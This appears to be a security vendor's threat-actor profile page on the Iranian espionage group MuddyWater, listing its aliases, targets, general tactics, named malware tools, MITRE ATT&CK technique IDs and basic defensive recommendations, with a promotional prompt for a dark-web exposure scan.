Nation-State Actor
MuddyWater
Iran • Active since 2017
MuddyWater is an Iranian spy group that sends fake documents that look like invoices or resumes. When people open them, their computers get infected. They target governments and telecom companies in the Middle East.
Overview
MuddyWater is an Iranian state-sponsored threat group attributed to the Ministry of Intelligence and Security (MOIS). They conduct espionage against government and telecom sectors across the Middle East, Asia, and Europe.
Also Known As
Static Kitten, MERCURY, Seedworm, Mango Sandstorm
Target Industries
Government, Telecommunications, Oil & Gas, Defense, Education
Target Regions
Middle East, Turkey, Pakistan, Europe, United States
Is your business exposed?
Tactics, Techniques & Procedures
- • Spear-phishing with malicious macros
- • Living off the land
- • PowerShell abuse
- • Side-loading DLLs
- • Tunneling tools
Known Tools & Malware
POWERSTATS, MORIAGENT, Small Sieve, STARWHALE, PhonyC2
Notable Campaigns
Middle East Government Targeting (2022)
Widespread campaign against government entities using novel PowerShell implants.
Telecom Sector Operations (2021)
Targeted telecom providers for intelligence collection capabilities.
MITRE ATT&CK Techniques
T1566.001, T1059.001, T1218, T1574.002, T1572
Defense Recommendations
- 1.
Disable Office macros organization-wide
- 2.
Monitor for PowerShell abuse patterns
- 3.
Deploy advanced email filtering
Related Threat Actors
Is your business exposed?
Check if your company data is circulating on the dark web
Free scan • No credit card required